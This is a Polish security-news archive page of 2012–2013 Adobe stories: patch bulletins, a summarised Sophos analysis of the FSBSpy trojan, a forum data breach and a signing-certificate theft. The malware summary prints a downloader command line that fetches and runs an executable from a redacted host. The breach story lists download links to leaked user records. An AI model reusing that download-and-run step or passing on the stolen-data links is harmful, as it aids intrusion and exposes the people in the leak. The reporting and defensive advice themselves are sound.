Artykuły dotyczące tematu: Adobe

dodany: 28.06.2013 | tagi: , , ,

Adobe udostępnia kod kompilatora FlasCC

0

Adobe udostępniło kody źródłowe FlasCC, kompilatora C++ do Flash. Źródła przechowywane są na GitHubie pod nazwą Crossbridge – do tej pory program był częścią płatnego Creative Cloud. Można zakładać, że Adobe liczy na utworzenie społeczności wokół narzędzia, jednocześnie poinformowało, że nadal będzie zaangażowane w jego rozwój.

FlasCC rozwijany jest od 2012 roku, po zmianie nazwy z Alchemy. Ma ono ułatwić portowanie programów napisanych w C i C++ na technologię Flash i AIR. Wersja 1.0.1 wprowadza tylko pomniejsze zmiany, ale autorzy mierzą w bardziej znaczące cele w nadchodzącym wydaniu 1.1, dotyczące między innymi lepszej obsługi Clanga i LLVM.

dodany: 17.05.2013 | tagi: , , , ,

Adobe znów łata

1

Adobe opublikowało biuletyny bezpieczeństwa dla produktów Flash Player oraz Acrobat i czytnika plików PDF. Jak zwykle nie obyło się bez masy błędów, które krytycznie narażały bezpieczeństwo użytkownika. W przypadku Flasha jest to zaledwie 13 luk, natomiast w Adobe Acrobat i wersji Reader zostało naprawionych łącznie aż 27 słabości. Część z luk w Adobe Flash pozwalała na przejęcie kontroli nad atakowanym systemem, natomiast pozostała większość dotyczy problemów z naruszeniem pamięci. Aktualizacji Flasha powinni dokonać szczególnie wszyscy, którzy mają jedną z poniższych wersji:

  • Adobe Flash Player 11.7.700.169 oraz wersje wcześniejsze dla systemów Windows oraz Macintosh
  • Adobe Flash Player 11.2.202.280 oraz wersje wcześniejsze dla systemu Linux
  • Adobe Flash Player 11.1.115.54 oraz wersje wcześniejsze dla systemu Android 4.x
  • Adobe Flash Player 11.1.111.50 oraz wersje wcześniejsze dla systemu Android 3.x i 2.x

Błędy te są także powiązane z Adobe AIR w wersjach:

  • Adobe AIR 3.7.0.1530 oraz wersje wcześniejsze dla systemu Windows i Macintosh
  • Adobe AIR 3.7.0.1660 oraz wersje wcześniejsze dla systemu Android
  • Adobe AIR 3.7.0.1530 SDK & Compiler oraz wersje wcześniejsze

Tradycyjnie nie obeszło się bez wpadek w czytniku plików PDF – tutaj aktualizacji powinni dokonać bezwzględnie użytkownicy następujących wersji:

  • Adobe Reader XI (11.0.02) oraz wersje wcześniejsze 11.x dla systemów Windows i Macintosh
  • Adobe Reader X (10.1.6) oraz wersje wcześniejsze 10.x dla systemów Windows i Macintosh
  • Adobe Reader 9.5.4 oraz wersje wcześniejsze 9.x dla systemów Windows, Macintosh i Linux
  • Adobe Acrobat XI (11.0.02) oraz wersje wcześniejsze 11.x dla systemów Windows i Macintosh
  • Adobe Acrobat X (10.1.6) oraz wersje wcześniejsze 10.x dla systemów Windows i Macintosh
  • Adobe Acrobat 9.5.4 oraz wersje wcześniejsze 9.x dla systemów Windows i Macintosh

Powiązane luki wyżej wymienionych wersji także pozwalały na przejęcie kontroli nad atakowanym systemem.

dodany: 11.03.2013 | tagi: , ,

Tajemnica luki zero-day w Adobe

0
Tajemnica luki zero-day w Adobe

SophosLabs zostało poproszone o pomoc w znalezieniu informacji o malware wykrytym podczas dziwnego ataku. Znalezisko jest co najmniej intrygujące. Wygląda na to, że badacze wskoczyli w sam środek rozwoju i testowania tajemniczego projektu, dlatego byli chętni podzielić się zdobytą wiedzą.

 

Co znaleziono?

Odkryto środowisko testowe malware, błąd zero-day i kilka cyfrowo podpisanych malware. Co dziwne – pliki malware nie korzystały ze sztuczek przeciwko debugowaniu, albo ukrywających złośliwe oprogramowanie przez antywirusami, których można by spodziewać się po tego typu oprogramowaniu. Wręcz przeciwnie – ekipa z SophosLabs znalazła wersję zawierającą ułatwienia debugowania. Ścieżki do tego celu zdają się sugerować, że pliki są częścią tajnych operacji.

1

Oczywiście w przypadku tajnych operacji byłoby mocno nieprawdopodobne popełnienie tak podstawowych błędów. Najprawdopodobniej podobnych nazw użyto jako zapory dymnej w celu wywołania zakłopotania. To co odkryto wyglądało na środowisko testowe używane przez grupę kryminalną w celu przetestowania swojego ostatniego dzieła. Dodatkowo cyfrowy podpis użyty w złośliwym oprogramowaniu występował już wcześniej w innych miejscach – co zauważyli ludzie z Kaspersky Labs w złośliwym kodzie wykorzystującym inną lukę zero-day. Czas pogrzebać w tym głębiej.

 

Składniki malware

Atak zaczął się z wysyłaniem do odpowiednich osób e-maili zawierających informacje, które powinny nakłonić odbiorcę do kliknięcia w link. Link prowadził do grupy złośliwych komponentów, hostowanych gdzieś w Turcji. Na tym etapie ataku komputery miały zostać przejęte za pomocą eksploita na Adobe Flash. W plikach konfiguracyjnych ekipa Sophos zauważyła, że celem była tylko przeglądarka Firefox i nawet po podjęciu wysiłku, nie udało im się uruchomić ataku bez ręcznej pomocy. Taki sposób nazywa się często „spoon-feeding” (z ang. ‚karmić łyżeczką’, w przenośni oznacza niestawianie wyzwań, prowadzenie za rękę, podawanie na tacy) . W połączeniu z innymi rzadko spotykanymi w przypadku malware rozwiązaniami można wyciągnąć wniosek, że programiści nie skończyli jeszcze pracy nad atakiem. Mimo to, niepełna wersja programu nie przeszkadza im w analizie zamierzonego sposobu działania. Wiedza, co chcą zrobić cyberprzestępcy, może być przydatna dla deweloperów oprogramowania, w celu załatania lub wykrycia potencjalnych dziur zanim zostaną one wykorzystane.

 

Jak miał wyglądać atak (w uproszczeniu)

Na początku kilka złośliwych plików zostaje ściągniętych na komputer:

  1. Program ściągający, spakowany w pliku nazwanym scode.dll, który jest wrzucany do katalogu instalacji Flash – tuż obok innych plików z bilbiotekami;
  2. Plik shellcode o nazwie scodeexp.txt (do odpalenia na Windowsie XP);
  3. Plik shellcode o nazwie scode.txt (na inne wersje Windowsa).

Produtky Sophosu wykrywają ww. pliki jako Troj/FSBSpy–A.

Proces zarażania

I tu zaczyna się zabawa:

  1. shellcode ładuje plik scode.dll do wykonania brudnej roboty (tutaj plik dll jest zwykłym plikiem wykonywalnym w specjalnym formacie);
  2. 2.    dll zawiera wbudowany plik exe, który jest wrzucony do tymczasowego folderu o ciekawej nazwie – taskmgr.exe;
  3. dll odpala taskmgr za pomocą linii poleceń: dl http://www.[wycięte]/​explorer.exe.

Fałszywy plik wykonywalny taskmgr nie jest zbyt ambitny. Nie sprawdza, czy pierwszy parametr to dl i nie sprawdza, czy drugi rzeczywiście jest adresem URL. Jego działanie jest proste – ściąga cokolwiek znajdywało się w podanym adresie, zapisuje do tymczasowego folderu i uruchamia proces. Jednak to nie koniec ;)

Keidy zostaje wywołany podrobiony plik explorer.exe kopiuje sam siebie do folderu autostartu wybierając mniej podejrzaną nazwę IAStorIcon.exe. Teraz komputer jest już aktywnie zainfekowany i zaraza jest stała (ciekawy sposób mówienia, że malware przeżyje pomiędzy logowaniami i rebootami zamiast umierać tuż po skończeniu sesji użytkownika). Program ściągający został skompilowany w trybie debugowania, więc zawiera odniesienia do plików PDB. PDB, czyli Program Database – pliki, w których zawarte są symboliczne informacje o programie. Przeważnie nie otrzymujesz programów z informacjami do debugowania. Po pierwsze – daje to trochę informacji o wnętrzu programu, a po drugie – znacząco zwiększa wielkość pliku wykonywalnego.

Nazwy plików PDB są ciekawe:

C:ClassifiedProjects​ProjectDefense​Firefox­Binary­Loaded­WithCertificate​Loader­FirefoxSigned​Loader­ReleaseFinalCERT.pdb (z pliku DLL).

C:Classified​Investigations​National­Security​sco.pdb (z pliku EXE).

Jak już wcześniej zostało wspomniane, nazwy nie tylko sugerują poufną operację bezpieczeństwa, ale wręcz przesadnie to pokazują. Jest nieprawdopodobnym, żeby takie operacje używały aż tak oczywistych nazw plików, więc prawdopodobnie jest to tylko zapora dymna.

2

Samo malware – explorer.exe – jest podpisane cyfrowo za pomocą przekonującego certyfikatu, a bynajmniej nie za pomocą certyfikatu, który jest zrobiony samodzielnie i już wygasł. Produkty Sophosu wykrywają podpisane pliki jako Troj/FSBSpy–B.

Cel malware

Fałszywy program explorer.exe to malware typu zombie. Lepiej znane jako bot. Komunikuje się z centralą za pomocą serwera Command-and-Control (w skr. C&C, ‚komenda i kontrola’) używając numeru IP należącego do usługodawcy z Holandii.

3

W tym złośliwym oprogramowaniu można wyróżnić trzy główne funkcje:

  1. pobiera podstawowe informacje o systemie;
  2. poprzez zdalne wydanie polecenia może zrobić zrzut ekranu i wysłać go na odpowiedni serwer;
  3. poprzez zdalne polecenie może ściągnąć i uruchomić nowe malware.

O ile system C&C bota jest bardzo prosty, to obsługa pobierania nowego malware jest stosunkowo skomplikowana. Ściągnięte złośliwe programy nigdy nie pokazują się jako pliki na dysku, co zdecydowanie utrudnia zauważenie ich obecności w systemie. Badany explorer.exe ma wbudowane ładowanie oprogramowania bezpośrednio do pamięci operacyjnej. Obsługuje to importowanie, relokację i wiele innych procesów – robi dokładnie to samo, co system operacyjny podczas uruchamiania programu z dysku. Jak tylko nowe pliki zostaną ściągnięte, zbudowany zostanie obraz wykonywalny w pamięci – odnosi się do niego w sposób bezpośredni – bez pośrednictwa, tworzenia osobnych wątków czy procesów.

 

Co zostaje wykradzione

FSBSpy-B zaczyna od wysłania wiadomości o systemie zawierających podstawowe informacje, jak:

  • rodzaj jednostki CPU,
  • ilość pamięci RAM,
  • wielkość dysku,
  • ilość wolnego miejsce na dysku,
  • wersję systemu Windows,
  • detale rejestracji,
  • strefę czasową,
  • SID (numer identyfikacji bezpieczeństwa – służy identyfikacji użytkowników i grup w systemie),
  • listę zainstalowanych aplikacji.

Komunikacja z serwerem C&C, w tym wysyłanie i pobieranie danych, jest szyfrowana za pomocą algorytmu AES – klucz do szyfrowania jest wbudowany w fałszywy explorer.exe. Złośliwy program zawiera także funkcję do znajdywania plików o nazwach *.tmp w folderze tymczasowym i wysyłania ich na serwer. Jednak ten fragment nigdy nie jest używany – kolejna wskazówka, że malware nie jest kompletne i skończone.

4

Na koniec warto wspomnieć, że oprogramowanie jest pełne wiadomości ułatwiających debugowanie. Dodatkowo jeśli uruchomiony jest jako proces o ID4 (proces systemowy), malware wysyła sekwencję alertów pokazujacych postęp działania.

Profesjonalnie i amatorsko

Cały program nie jest skończony i wygląda na zbiór modułów, które jeszcze nie najlepiej ze sobą współpracują. W kodzie widać wiele nieporęczności, które są zbalansowane wykorzystaniem pluginów bezpośrednio w pamięci RAM oraz użyciem nieznanego wcześniej exploita zero-day na Flash. Ekipa z SophosLabs doszła do wniosku, że jest to mieszanka zintegrowanych po amatorsku części wypracowanych przez profesjonalistów.

 

dodany: 27.02.2013 | tagi: , ,

Adobe znów łata Flasha

0

Nie wiadomo czy cieszyć się z tego faktu, że Adobe stara się załatać błędy we Flashu, czy też może po prostu pogniewać się na firmę, że nie potrafi wprowadzić porządnych aktualizacji. W lutym wypuszczono już trzecią poprawkę! Niestety w przeciwieństwie do Javy, bez Flasha ciężko się dziś obejść.

Niech nie zmyli Was pozorne ulepszenie wydajności, bo o tym zawsze napiszą. Znów wykryto kolejne rażące luki, które były wysoce niebezpieczne, ponieważ pozwalały na przejęcie kontroli nad atakowanym systemem. Oprócz tego w pewnych bliżej nieokreślonych przypadkach wadliwy Flash mógł spowodować crash ;)

Najnowsze wydanie dla systemów Windows i Mac OS ma oznaczenie 11.6.602.171 (po raz pierwszy to samo oznaczenie), natomiast dla Linuksów 11.2.202.273. Na atak narażeni są użytkownicy Flasha 11.6.602.168 a także jego wcześniejszych wersji. W przypadku Linuksa zainteresować powinni się wszyscy posiadający Flasha z numerem 11.2.202.270 i wcześniejszymi.

Naprawione luki są opisane pod CVE-2013-0643 oraz CVE-2013-0648 – są one odpowiedzialne za wspomniane wyżej luki – atak można było przeprowadzić za pomocą spreparowanego pliku .swf – wystarczyło, aby ofiara kliknęła w niego, aby zostać przekierowana do strony ze złośliwą zawartością. Na pocieszenie pozostaje fakt, że atak ten był możliwy wyłącznie w przeglądarce Firefox.

Błąd opisany pod CVE-2013-0504 mógł spowodować przepełnienie buforu, który nie tylko mógł doprowadzić do zawieszenia systemu, ale także uruchomienia złośliwego kodu.

Wszystkie zmiany w nowych wydaniach są opisane w biuletynie bezpieczeństwa Adobe.

dodany: 21.02.2013 | tagi: , , , ,

Najnowsza krytyczna aktualizacja Adobe już dostępna

14

Szybko poszło. W zeszłym tygodniu Adobe obiecywało szybkie wydanie aktualizacji i proszę, oto jest update.

Firma postanowiła przyspieszyć wydanie aktualizacji po tym, jak 12 lutego otrzymała informację o luce, która była aktywnie wykorzystywana w systemach Windows i Mac OS.

Wszystko poszło dość szybko i sprawnie:

12.02. FireEye zgłosiło buga, bez podawania szczegółów.

13.02 Adobe publikuje informacje o tym, jak tymczasowo zapobiec wykorzystaniu luki na Windowsie.

W czasie weekendu Adobe ogłasza, że w przyszłym tygodniu aktualizacja zostanie wydana.

20.02. Aktualizacja zostaje wydana.

Aktualizacja dostępna jest dla wszystkich platform, więc zarówno użytkownik Linuksa, Windowsa, jak i Maca powinien niezwłocznie udać się na stronę Adobe i zaktualizować swoje programy.

Adobe podzielił aktualizację na trzy priorytety:

Pierwszy dla użytkowników systemów Windows i Mac, dla wszystkich obsługiwanych wersji produktów (9, 10, 11), w których luka jest aktywnie wykorzystywana i należy ją wykonać w przeciągu 72 godzin.

Priorytet 2 należy do użytkowników Linuksa i oznacza, że luki podobne do tych w Windowsie i Macu istnieć mogą, ale exploity nie są znane i należy ją wykonać w przeciągu 30 dni.

Numer 3 należy do naprawienia luk w zabezpieczeniach produktów, które nie były celem ataków. I zaleca się administratorom jej aktualizację według własnego uznania.

Poza wizytą na stronie aktualizację można znaleźć w zakładce Help/ Check for Updates.

Jeśli używacie Windowsa lub Maca nie zwlekajcie z aktualizacją.

dodany: 16.02.2013 | tagi: , ,

Adobe potwierdza ataki spowodowane dziurą w Readerze

3

Luka zero-day w Adobe Reader i Acrobat została wykorzystana przez szereg ukierunkowanych ataków na podatne komputery.

W biuletynie bezpieczeństwa Adobe potwierdziło, że luki mogą powodować problemy z Readerem i Acrobatem, co potencjalnie otworzy drzwi atakującemu i pozwala na przejęcie kontroli nad systemem.

Ale potencjalne przejęcie to chyba niedomówienie miesiąca. Adobe jest w posiadaniu raportów, które mówią dokładnie i bez ogródek, że luki zostały użyte w atakach, które oszukały wielu użytkowników Windowsa i namówiły do otwarcia zainfekowanego pliku PDF wysłanego im w e-mailu.

Adobe ciągle pracuje nad rozwiązaniem problemu z luką i obiecuje raportować o postępach. W międzyczasie użytkownicy Windowsa używający Adobe Readera XI i Acrobata XI powinni chronić się przed exploitem przez włączenie widoku chronionego:

  • Otwórz Reader lub Acrobat.
  • Kliknij w menu Edycja i wybierz Preferencje, a następnie kliknij na Bezpieczeństwo lub Zwiększenie Zabezpieczeń.
  • W sekcji chroniony widok (Protected View) kliknij na przycisk w górnej części okna i włącz widok plików z miejsc potencjalnie niebezpiecznych.
  • Zatwierdź klikając na OK.

Rozwiązanie tymczasowe pomaga jedynie użytkownikom produktów Adobe w wersji XI korzystających z nich na Windowsie.

Lukę odkryła podobno firma FireEye, ale doszli do porozumienia z Adobe i postanowili nie publikować szczegółów technicznych luki.

Chyba nie musimy przypominać o zachowaniu ostrożności przy otwieraniu nieznanych plików PDF?

dodany: 09.01.2013 | tagi: , ,

Adobe reaguje na lukę po upływie 2 lat

2

Adobe poinformowało o planach załatania dwuletniej luki w oprogramowaniu Shockwave , która pozwala na zdalne wykonanie kodu na komputerach użytkowników. Według rzecznika firmy dziura ta zostanie załatana prawdopodobnie  w lutym tego roku. Luka pozwala hakerom na podmienienie oprogramowania Shockwave na starszą wersję, bardziej podatną na ataki, z uwagi na większą ilość luk. Chociaż  o problemie tym wiadomo już od dwóch lat, kiedy to Computer Emergency Readiness Team (US CERT) wydało ostrzeżenie o zagrożeniu, to do tej pory nie zgłoszono żadnego przypadku ataku.

Ponieważ Shockwave jest ściśle zintegrowane z innym oprogramowaniem Adobe, takim jak Flash, otwiera to także możliwość naruszeń bezpieczeństwa innego softu tego producenta.

„Dzięki takiej konstrukcji, napastnik może po prostu celować w luki przy  uruchamianiu Shockwave 10 lub w każdy z dodatków oferowanych przez Shockwave 10” informuje US CERT. „Na przykład, poprzednia wersja Shockwave dostarcza Flash Playera w wersji 8.0.34.0, który został wydany w dniu 14 listopada 2006 roku i zawiera wiele znanych luk.”

Chociaż  US CERT opublikowało w tej sprawie dwa ostrzeżenia, Adobe koncentruje się na bezpieczeństwu Flasha, ponieważ wpływa to zarówno na bezpieczeństwo użytkowników pecetów jak i maków.

Lips Wiebke, starszy menedżer z Adobe Corporate Communications, uważa, że luki te nie są tak niebezpieczne, jak się wydaje, podpierając się słowami:  „Nie są znane żadne aktywne exploity lub ataki przy użyciu tych technik”.

Mimo to, Adobe planuje rozwiązać problem najszybciej jak to możliwe (sic), nie określając konkretnej daty publikacji łatki.

dodany: 15.11.2012 | tagi: , ,

Egipcjanin zaatakował Adobe

0

Egipski haker pod kryptonimem ViruS_HimA  włamał się na serwery należące do Adobe. W efekcie ataku wykradł sporo prywatnych danych – opublikowana baza zawiera 230 maili i loginów wraz z  zahaszowanymi hasłami, aczkolwiek haker zadeklarował iż jest w posiadaniu 150 tysięcy rekordów. Dane te należą m.in. do pracowników Adobe oraz jej firmowych partnerów m.in. wojska USA, Sił Powietrznych USA (USAF),  NASA, DHL oraz Google. Poza mailem są także: numer telefonu, imię i nazwisko, tytuł oraz firma.

Jak podaje sam haker, kierował się intencjami zniszczenia biznesu firmy, która mimo, iż jest potężna, to nie stosuje odpowiednich zabezpieczeń – zapowiedział też, iż następnym jego celem będzie Yahoo. ViruS_HimA zarzuca korporacji długi czas odpowiedzi na publikowanie poprawek dotyczących bezpieczeństwa.

Częsć opublikowanych danych przez Virus_hima

 

Informacja o zhakowaniu pojawiła się na PasteBin. Upublicznione dane są dostępne oczywiście na paru serwerach:

http://www.sendspace.com/file/lox8oe

·         http://www.multiupload.nl/P8PNGS4X0R

·         http://www.mirrorcreator.com/files/HUUQ6DL9/adobe-leaks.txt_links

·         http://www.gulfup.com/?9QneTn

·         http://arabsh.com/files/0e3f434c6df3/adobe-leaks-txt.html

·         http://www4.gigafile.nu/v3/?c2b5939a7f053e8bd8d1f22003b44a7a

Adobe przyznało się do wycieku, aczkolwiek podało, iż dane te pochodzą wyłącznie z bazy ich forum connectusers.com. Forum to jest obecnie niedostępne. Korporacja podjęło śledztwo w tej sprawie, ale czy nie lepiej zapobiegać niż „leczyć”?

dodany: 08.10.2012 | tagi: ,

Adobe znów łata

0

Adobe wydało aktualizację Flash Playera na każdą dostępną platformę. Ciekawe natomiast jest, iż nigdzie nie było wzmianki dotyczącej  aktualizacji Internet Explorera 10. Jak się okazało było to spowodowane tym, iż Microsoft ma zamiar wprowadzić kompletną aktualizację IE 10.

Biuletyn Adobe APSB12-22  informuje o wniesieniu 25 poprawek dotyczących bezpieczeństwa. W przypadku Microsoftu aktualizacja będzie się zawierać w Security Advisory APSB12-22 , który ma m.in. poprawkę o oznaczeniu KB2758994, dotyczącą właśnie flasha Adobe w IE.

Oprócz tego, Microsoft wydał także wersje na opracowywany system Windows Server 2012 . Poprawka dla systemów Windows 8 jest dostępna pod tym adresem  oraz stąd w przypadku wersji x86. Microsoft wydał także poprawki dla edycji Release Preview, które można pobrać z tego miejsca.

dodany: 27.09.2012 | tagi: , ,

Adobe znów zaatakowane

0

Adobe poinformowało, iż ich infrastruktura odpowiedzialna za zarządzanie cyfrowymi certyfikatami została zhakowana. Nieznani dotąd sprawcy zdobyli w ten sposób certyfikaty, którymi podpisywali swój malware.

Wśród nich znajduje się podejrzane narzędzie o nazwie pwdump7, które pozwala na wydobycie zahashowanych haseł do systemów Windows. Drugim podejrzanym plikiem podpisanym sygnaturą Adobe jest myGeeksmail.dll – biblioteka ta stanowi filtr ISAPI. Dyrektor Adobe – Brad Arkin podał informację, iż nie wie jak doszło do ataku oraz że jest w tej sprawie nadal prowadzone śledztwo.

Cała sprawa ujrzała światło dzienne dość późno, gdyż atak prawdopodobnie nastąpił już w lipcu. Adobe zaplanowało 4 października unieważnić wszystkie certyfikaty po 10 lipca 2012. Dotyczy to m.in. aplikacji Adobe AIR oraz Adobe Muse. Firma zapewniła oczywiście, iż klienci nie zostaną pozostawieni sobie i uruchomią w tym celu dedykowany support.

Arkin zaleca także, aby nie dodawać ręcznie zainfekowany certyfikat o numerze seryjnym 15 e5 ac 0a 48 70 63 71 8e 39 da 52 30 1a 04 88 do Windows Untrusted Certificate Store, którego rzekomym wydawcą jest Adobe Systems Incorporated. Dyrektor nadmienił też, iż jest właśnie opracowywany nowy system podpisywania aplikacji.